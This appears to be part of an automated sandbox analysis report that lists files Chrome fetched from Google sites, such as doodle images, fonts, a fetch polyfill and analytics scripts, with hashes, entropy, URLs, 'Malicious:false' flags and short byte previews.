                                                                                                                                                                                                                                                            Preview:/*.. Copyright (c) 2014-2016 GitHub, Inc.. SPDX-License-Identifier: MIT.*/.(function(self){if(self.fetch)return;var support={searchParams:"URLSearchParams"in self,iterable:"Symbol"in self&&"iterator"in Symbol,blob:"FileReader"in self&&"Blob"in self&&function(){try{new Blob;return true}catch(e){return false}}(),formData:"FormData"in self,arrayBuffer:"ArrayBuffer"in self};if(support.arrayBuffer){var viewClasses=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]",."[object Float32Array]","[object Float64Array]"];var isDataView=function(obj){return obj&&DataView.prototype.isPrototypeOf(obj)};var isArrayBufferView=ArrayBuffer.isView||function(obj){return obj&&viewClasses.indexOf(Object.prototype.toString.call(obj))>-1}}function normalizeName(name){if(typeof name!=="string")name=String(name);if(/[^a-z0-9\-#$%&'*+.\^_`|~]/i.test(name))throw new TypeError("Invalid character in header
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1092 x 430
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):304063
                                                                                                                                                                                                                                                            Entropy (8bit):7.9323912020972305
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:dgT8jECodEUNbM7KSYgJjXuNFS/6zxC7Jgn1NKFnNOPLLBfW9ic8xGihahR:dk8gTrNUKgSNESMJz7IPBfQnr
                                                                                                                                                                                                                                                            MD5:6F22BE4E029E93D82823665A482806B0
                                                                                                                                                                                                                                                            SHA1:3B85B34FF76BBA7F833E0C09FF96846615CAE73A
                                                                                                                                                                                                                                                            SHA-256:4049C498F790AFB44C422CA6A799DA70F1E78798B5E71B93692CA3DD0B6FF5FC
                                                                                                                                                                                                                                                            SHA-512:58B5B85C97BF57F9D1086E1DB888A5883A291E035ADEF1290D80ECA6F0F19C7901901F366342CBDF99D2D806104FC972812B9BA39BEB44349A95C6DCE67E186A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2016/first-day-of-spring-2016-northern-hemisphere-5727786629070848-hp2x.gif
                                                                                                                                                                                                                                                            Preview:GIF89aD........p..i..vv..x...goR..fBI4...hk_rug..SXJ...mpc..._dM...RY?}.s................i......6:+.....yz.\...z.c......<D0..{...........s...........[^T..}...(....s..v........{.....k....Vv~.b......:A,..it.Z`cZ.......1e..soqh}.j.........|H0.....rpuym................ehVS....^......~.v.......x}.]..l..ouca..|.....\ajK...5.......p..........q...UB>............s}U...w$..............v|b........j}}|.....IM8..SB,...U]C........qw.T}.[...........m..b..jx.Z......zto..~........_OI..o. .`iENY;...sum...........nwVIQ8..s...u..UAE2u.WNU>x}j.lm...^eG.....y}p..y...NU8U]<...Y_AY`GIO>]aF...MPF....}}uy}u...yynMQ:...}}o.........u........uEM4]aA...........]eAnyP...q.UKY4......YeG.........yyuIU8EL9..a.wa...bgSW]LlaI}ys.....l.............n..ugqLXh@..xqyh......!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/199
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x330, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):52211
                                                                                                                                                                                                                                                            Entropy (8bit):7.916277691672813
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:eaJw03BzzN9TW/q2yiLadBem+t1GPJ15petmb+yN:eaJwCBHN9TNhZmxzGPJ15prN
                                                                                                                                                                                                                                                            MD5:EBB73531F819F8677B9A9807E4FB5890
                                                                                                                                                                                                                                                            SHA1:0E7DCAFBFB73D2151DD15B6A9783DF9B5D9C0E4C
                                                                                                                                                                                                                                                            SHA-256:697EA7CC49EE19281AE757A1381348CDB680B9F20023D238AA5E47A34CBA35BC
                                                                                                                                                                                                                                                            SHA-512:DDE2596F269D35225827BC64095D5418451672CC18B28206EBC60EC05E7B16B08E090F9F4FC7FD3974521FE5E035B12E0D39A8552F5110189A6C9B2B07E45A12
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 44624, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):44624
                                                                                                                                                                                                                                                            Entropy (8bit):7.994409531911626
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:kU6hhXIqdDXqzPj+EMBR/Rxtp4zj6ll71tkO/yXwLgJ+xexB/X3:kZXIqdDXqz6DPFp4X6ll7Lh/yXwoxx3
                                                                                                                                                                                                                                                            MD5:1CDEB42DDFB090323E7011ABD0F139E3
                                                                                                                                                                                                                                                            SHA1:545972492DC245611362CCBD37738B3BFDC19F75
                                                                                                                                                                                                                                                            SHA-256:AAE8ACBADB18BC3278F7376CE0F6E1420070F045F8BC8847A4DB62B5D3D6B02D
                                                                                                                                                                                                                                                            SHA-512:6FFE2ABB4A5ABFB6021A62566820D21303CDD7501AB7725C2540C11720733AFBF44CEC9597C2BC708639123F0916A75D155D7927631AED0DB7EDF8F37D6BB6A8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjMUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2.......P.........................................z...h?HVAR...`?STAT..'..../<...........8.0....6.$..d. ..>. ..[K.q.&qW+.....f..})?.#..>....U.....J...n.........C..z...Z.~...^QaQ......!..V..5Z..q.>B.:.J.w....0......"...2`....h&.O.M.W..c;\.3.p..4a!M......M.4\....\.....3..b.,..t.s.]..T.'N...]a...~.......R....7R..ij~D].,...|..W..MR.5......)..c...P.."......w..C@<6GU..=.5.X..y~n........r...=.)mDc.h...f..Lr.y.;/..!....~..b.XLS.E.3..1.s2..C.s.".HiLY.....)E.)E>f1F..(.iD.9.1.H."...""".4...|..?.4>I..O0d;qh..1..................w....5..T....1..!..."miK.I#.....L?...>.M-U!..l0..`...jc..6..11..L._{..8In.~T..nA.u.@............. .?...u.V./..o.-...^...T:.:q.....\.kW.`a...d..9...f7.}YrF)....(.. p...R..;i.^..A..TW1r..mVI.n...HA.....A......E...P.`p.L...1.Q..Sr^.z..B..|:...%..A....Cn.T..sR4m.t.?_:Z... ...0v.l....0..=.P.<.._.Ig5..@..A.....h^.4s..<Dje..J(^../....N..*...n.Fa......Pp...x/....Y.=.l..\.\.[.9.}..p.r..Qc....mVU.;.&.D..M. ..........._.{.k
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):91297
                                                                                                                                                                                                                                                            Entropy (8bit):7.965561514558198
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:voD00H761InWBCitTjai1nfPi1ld0skTUUR4PmnywSTUr4QwSyjJS:w4yKInWdBmiwp0sLUYmyVTUej4
                                                                                                                                                                                                                                                            MD5:0B7F79C52CCEBE46B9ADA8938BD83A91
                                                                                                                                                                                                                                                            SHA1:D4BC1E159B91AB07F0F04F963B1C7D785EA8E045
                                                                                                                                                                                                                                                            SHA-256:12806E0701A1373FEDAB79DAFFA58041E75C959D44D6B2F12CE9173C5D7315E8
                                                                                                                                                                                                                                                            SHA-512:FE22A05B6D004415D93CB8009F94105A83929F138A7245D42F3DBC675E5EE5C133B963E9C94214FAF2A08139CF08D073EF8A25C60B4BE882F90FDF521156B652
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/tunisia-national-day-2019-5078217890201600.2-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a........*.......f.*....,!.*..&[..].*.<....m...E...&8..pg.a..h.gOMxm..0%FY.....h.*.......5...PNr........T...*.....K1.js...n....nA..........4....\.%.y...9F.....m..H...HS....).........l....V7..j.*...\..b.....u..g..h..M.........%.>..E....l./)......~........~..........)$=.._n...}.8T]..%.W....v.x.sBF....+\X....ed().......%..Zd......+w..{..K..(...q......7Ml=........$.....1<..r.{f..._CU..z9i`....<.......X...=5q..S..#...n...i.<,..`..d.%4..k...(......v>.......x..."...a.%.{.......d.7 ..k.....m..Y0......g......g5..'...x_.....i....O........#.......*...e...........f.........j..y.....c.-.\....+...d..u<|..(......b..h..r.....d..r..=&@..d.(...r.0...b..p..p..r..r..o..`.._..s0....o.....d..m..d..b.,...o..b..i..f1........um..4.......n.......(8......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x813, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):97340
                                                                                                                                                                                                                                                            Entropy (8bit):7.701123900364287
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:0EsWvnOqLYEV1kmzUSr9WSsxquirzV4WVwqDGYAerPnkNWdGIPdqVPZN2/mE7:0ETvndj1DrkNcuiNbwqDGY00cFZ52
                                                                                                                                                                                                                                                            MD5:D230CE8FED6F1BF76AF2DC198A19AB01
                                                                                                                                                                                                                                                            SHA1:36CCC68DC5A9F51B63864651F62AF51EB28E1313
                                                                                                                                                                                                                                                            SHA-256:2D9327FE34F7FC3FE87356E329F88F0C9DB99988A3844AF6CAE0E9BD45CFFD17
                                                                                                                                                                                                                                                            SHA-512:9232DA5677DE85422DC5E2C28AA11933BD2253B4A7D72432899A1E2B4503D491B852636C67CCC1DAD76BAF5B0088B3DC05DFB31BFF701C1149B3497608122B87
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................-...."..........................................\.......................!...1.."AQaq...23Rr..#Bbs......5t..4CSu.....$c...%D....6d.....&U.....................................N........................!.1Qq.."Aa.2BRr..3......#4Cb....5Ss.....c.$.....T...............?.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):5340
                                                                                                                                                                                                                                                            Entropy (8bit):5.417060590753551
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:GhOEaoFZMOEauqOEamOEabo+OEaYN5hOXasFZMOXarqOXa/OXaQo+OXasN5hOpae:Gu+uNxb+QtZrOPQ9ULr3E9Ubo
                                                                                                                                                                                                                                                            MD5:F6F148DDDA08FF401FDF5994B2D154BC
                                                                                                                                                                                                                                                            SHA1:9068D36193F9A7F138DF17E504CDBADF3DB6FF65
                                                                                                                                                                                                                                                            SHA-256:52C850A4204E814FE7963A7417986621173F69AE3E7D3727DD1C4FCA9BD3DCD1
                                                                                                                                                                                                                                                            SHA-512:75BCC7241E9042639D78EF839439E604727671335FCACF34427ED11029493E3D45B2282ECA5595157B05E441DA7C9C24790C144110A6184967B097E0BF02CE8C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700&display=swap
                                                                                                                                                                                                                                                            Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* cyrillic */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2) format('woff2');. unicode-range: U+0370-03FF;.}./* vietnamese */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 660 x 264
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1237640
                                                                                                                                                                                                                                                            Entropy (8bit):7.838549926935758
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:vMNaSARd0FBc89kLjE/yAMODvvazFZKs+LiTIk1XItFLYu/bkJfvLVa869:4ed0FLNDqzTNWIIuV2Gc86
                                                                                                                                                                                                                                                            MD5:1AF26D1167E75AE644097DFA014BBCE8
                                                                                                                                                                                                                                                            SHA1:BEC3400B787EF247AD0D873D21FE615AA6231D67
                                                                                                                                                                                                                                                            SHA-256:CA19980280492826F7A9E8FB6A953F49A04CC37054A56DA4F11B22C83A079FA2
                                                                                                                                                                                                                                                            SHA-512:F96A88F467F79AC1198BB64C789B96C306E58F3B6F5E8F4A139E526A9F075C5CF9619566D0561DAEB96F464C3C5E20DA5C94C8E0AD807FBEFE640AEE5C303FAF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/hyqlKj6FYj8yAzPaJZB7cfknhp-7J4SY9rv3NRrQi7ox0HJiZKzUyqKGg6x7xXGmAO_ALYY2Ud--hoKC0sKY51sDCTu6yOMz-3TkpmQ=s660
                                                                                                                                                                                                                                                            Preview:GIF89a................#..*G.u.....G-...&GM.F......V.K.@.... .....L.....M"iKpy..h....&g.."#...V..&.O....).TiI.g....CP..g..%P.....e...F.b.M....j.HMI..Mh.0J(...q"$Vil.(,l.m.%nt...*-Bo...N..j........Fi......U.Gr..W.....tBl.Qg........t.i.v...,....V.j...(..ho..g...V....K..........,h,...Lg.]wM$7)-W,......*--U..6Th.PLh1l...s......s.l.*.dwp....4s..\.v..9..KL.....l.OPw6.#.\....p.Wq..0`........65.gf..eM....F..;..D.}....F;.ge7..n{.........GL...d.Cu.c..m*.,..dENtR.4...NK....r8./..r.....r....v.x.......VD.66.4#.y^.tr..E.|.X.:..2J9'.5....W....Z......*XN)...tK.v....Iv.o..e..k..,ul/w-...GW+5.f.w........;....*......OOu.Vw......SGY.\..NZL4.-U.6.XW...@X.?}....th.wKz..YX.....l...2.jKYmu.k...1Y.r..k..r.O....&!.i{.ms.<D..o..M......9....\..B.ME.FA.yx..r..uZ.9/J..8.!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L..a.`.+^..-.,.4hhL...`.\..c...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):846
                                                                                                                                                                                                                                                            Entropy (8bit):7.658615964509905
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:6v/75+FiSiSwIl1kctxgR9gZeQP722hGKuDl1DBqBSl6pSdxRP6q0no2fxEpytwX:AzQwIDw+VDv4BqBytJ0o2fSEtHwyKwu
                                                                                                                                                                                                                                                            MD5:E9CD262114358F26B7608B56905185DC
                                                                                                                                                                                                                                                            SHA1:6DBDE0A96DEAAB2B529723CE26C62043CF9180AB
                                                                                                                                                                                                                                                            SHA-256:5A861509B658AA24FC3AED2867AC3C061E7D818D90B9990959AFC6D1B5D4FF99
                                                                                                                                                                                                                                                            SHA-512:9CB46A8FD21A1C89A65642E1E5E79AF08BAC183612F88B8AC805A436E59ADD06588B450C6330291A6B61E7E6018B009015950D4457E46B68D9D742F983AB8488
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/product/1x/translate_24dp.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............w=.....IDATx.b..H..NN]n.Q..s..T.=S...U\.......77......|q......t!.]t.._x\......a.....";n.N..@...+:!....GG.~+..q.&g.B....@DN$.=...`..2..L.(.W.H.)....x..W.....P...A........p:=.q.....0y$..p.q.Q.E.w..<..$.....c.p`d...I,..G.9"/?..l.S..D......Q......|.....xx...{|DN...E..........d.....-*.s......8vt..b.....q.d....T....j.0>1...9Ir..D^|6.No.....+d......H.`#.-y!.;....2...\D.)............L..+.Z.[.T.. ...Ah...kp.).w.9.....E.Y..'.............n...G... ..b.....ph.U..*V..Fy.3.U].u..]r..v;x.^....Di*2.Q.... ....R.%.P&...Np:...,.:....0..t.U.Gpk..wHN..{..............#.Ab&'.$A<~....z(=~...y.,...b.A.....H...n{Q.1..`....cCKr ..HV.4.L...H.a.$D........Y}b..Z#...Mq.0.W..{?.[T....."pA.+<.l@........v..-......E.ZQ.=j....q.........ay.E%o.J^...Z..`.....[.......ZloW.Z...A........V+=.|C.:w........e..?.....IEND.B`.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (26280)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):238751
                                                                                                                                                                                                                                                            Entropy (8bit):5.552649727421315
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:/sKqz5OCXeUvKJ8GaP8sU00ap7BQkoUeCza32Zn0OU8ZZ0bieaGAWGuRVX+:2XeUvK6GaP8Ep9P/eCza3g0OU8NGAWJO
                                                                                                                                                                                                                                                            MD5:4D05110D3F9308C4293BC4BC412BBE48
                                                                                                                                                                                                                                                            SHA1:9E094BB221F4A9580ED9929F8FB341361165B28C
                                                                                                                                                                                                                                                            SHA-256:A1D7F465DE66317DE100DC92FDC185C60747C6C8BA348C16EBE9F8459D10F3FD
                                                                                                                                                                                                                                                            SHA-512:9BE209132CDE4541A6C851DC92A4E80458F5FF69B17C31878F36CE6BC809E4DF2AA51ED1D9D22CBE9E778A31D4533D1F7BDF179BB367A1E66FAFA19BD6FC0923
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-YEQ7E396JC
                                                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"google.ch"},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-YEQ7E396JC","vtp_sessionDuration":0,"tag_id":1},{"function":"__set_product_settings","vtp_instanceDestinationId":"G-YEQ7E396JC","vtp_foreignTldMacroResult":["macro",1],"vtp_isChinaVipRegionMacroResult":["macro",2],"tag_id":3},{"function":"__ogt_google_signals","vtp_googleSignals":"DISABLED","vtp_instanceDestinationId":"G-YEQ7E396JC","vtp_serverMacroResult":["macro",3],"tag_id":5},{"function":"__ccd_conversion_marking","vtp_conversionRules":["list",["map","matchingRules","{\"type\":5,\"args\":[{\"stringValue\":\"purchase\"},{\"contextValue\":{\"namespaceType\":1,\"keyParts\":[\"eventName\"]}}]}"]],"vtp_instanceDestinationId":"G-YEQ7E396JC","tag_id":6},{"function":"__ccd_em
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1592)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):612246
                                                                                                                                                                                                                                                            Entropy (8bit):5.746019493993741
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:AqNNde8ah5jqKd20TDm8xIeNeM4iL9UBd2X619xDTXVXbXPc5hr9XS:PNdeB5j/rTUBd2X619xDTXVXbXL
                                                                                                                                                                                                                                                            MD5:0E6AAA44E75ACDC30D39A36801B9131B
                                                                                                                                                                                                                                                            SHA1:E360A66568F22FA5728F3854D2EABD4457A71D07
                                                                                                                                                                                                                                                            SHA-256:517E74EB3AFEC3B810AD7B2A8EDFD7C79962F064C6AF81B200D02EC4B6461D81
                                                                                                                                                                                                                                                            SHA-512:28D8F199D4A76D5C0324E331FADE35AB9749477C8F469792374A62A9F1B07420EF024B419854F17BDA65DF548492A5DE36436CA2147CCC2F61D424FDD56DFB72
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/js/index.min.js?cache=e360a66
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b=b||{};b.scope={};b.createTemplateTagFirstArg=function(a){return a.raw=a};b.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};b.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};b.arrayIterator=function(a){return{next:b.arrayIteratorImpl(a)}};b.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):b.arrayIterator(a)};.b.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};b.arrayFromIterable=function(a){return a instanceof Array?a:b.arrayFromIterator(b.makeIterator(a))};b.ASSUME_ES5=!1;b.ASSUME_NO_NATIVE_MAP=!1;b.ASSUME_NO_NATIVE_SET=!1;b.SIMPLE_FROUND_POLYFILL=!1;b.ISOLATE_POLYFILLS=!1;b.FORCE_POLYFILL_PROMISE=!1;b.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.b.objectCreate=b.ASSUME_ES5||"function"==typeof
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):64142
                                                                                                                                                                                                                                                            Entropy (8bit):7.96920201898768
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:jIoRFGg8kZQovcJYjXCZLypIY9qYYstGLqWZ5qpgF:jIoRFkovcSuZ+JtGL5ipgF
                                                                                                                                                                                                                                                            MD5:9E25FF0C6D141A190A48B31022361B0F
                                                                                                                                                                                                                                                            SHA1:323A9D085B29D73E147789ECACAA355796AA4714
                                                                                                                                                                                                                                                            SHA-256:44A0C3188331615B066190C5E11DD616A847D84F33ACCDE90CFBB45E7B3AB4DD
                                                                                                                                                                                                                                                            SHA-512:F9E3D326234F5B2EC768157003F01D51B4149E80A5260DF91ECD065EBE923D8563CCAFE2C66417242367CF5326E962F251D78AF40A350C6213E7907A5847AB3D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/KR_tQgFYSc-6pG6sf0J8cb59cuL0GF_z76spHvHO-HAPqX8Fo_CNhJ3FfBIMJ0MLqmMERINkaPYQLUV-D4y3MtNNQcjaldjUU9KJtcprio0VKAmgeko
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................@.....................!...1.AQ.."aq..2......#B....R.b3r..s...$C.................................7......................!..1AQa..."q.......2...B#Rb.3..............?.......+....pi........K.nD(.N..u.i.$.....2.........5 @[. L.....^...#)...8.+9....Wd.....R.......i..x0H#o.C.W5.;.o...L.4.i...rm$...N..Z$IA..k..,.d.....A.q$@"-.....?.F..I..$...:@c.627.i......+. ......D.#..~..c.D.G..Yk.>+(........"L...)&....E.l.B........U.6LQ1..l...s..7..,GCy.q.!.2..".9^.........!..;A....;+...$.zX....~/..]+...-.]..q.U....u...H.p..cq.8.+Ri.3.........[+... FUh...$n...`..6..pH.q.+ZU.h...GKE.o..!..e.....*..Tm.........S..J...Q...z....>..I.t...._c.U...7.X.......R*.....I6.'.. _s~..iT.I.h...+.p..^..dr..w.....u....t.M.O..L..TecSK1.A.'A.X..|r..Uq..*3.Sc.(...8....f...=..6|.....<..S...=#..k."
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1592)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):615585
                                                                                                                                                                                                                                                            Entropy (8bit):5.746149620999882
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:AqNNdeYaf5jqKd2pFTDm8xIeNeM4iL9UBd2X619xDTXVXbXPtZIr9CZ:PNdez5j/wTUBd2X619xDTXVXbXX
                                                                                                                                                                                                                                                            MD5:EE0C467F8DDEE4612F3B2F8EDBE4C423
                                                                                                                                                                                                                                                            SHA1:DB4185002DD5943CA592CA4CA22BF118CE0050FF
                                                                                                                                                                                                                                                            SHA-256:E82753B183D13A48E72B8F5183764F30A94BDD495E2B299506B610D52A15404C
                                                                                                                                                                                                                                                            SHA-512:CBB2E981C8DD7B27755E98C4B2306E4CFF59939C1010D4CC06BD943FF64CEFC9E1A589D8D244AAEF0D59D15F2112327ACDB41B7194E5B27FD248F0FDC2F86B3C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/js/index.min.js?cache=db41850
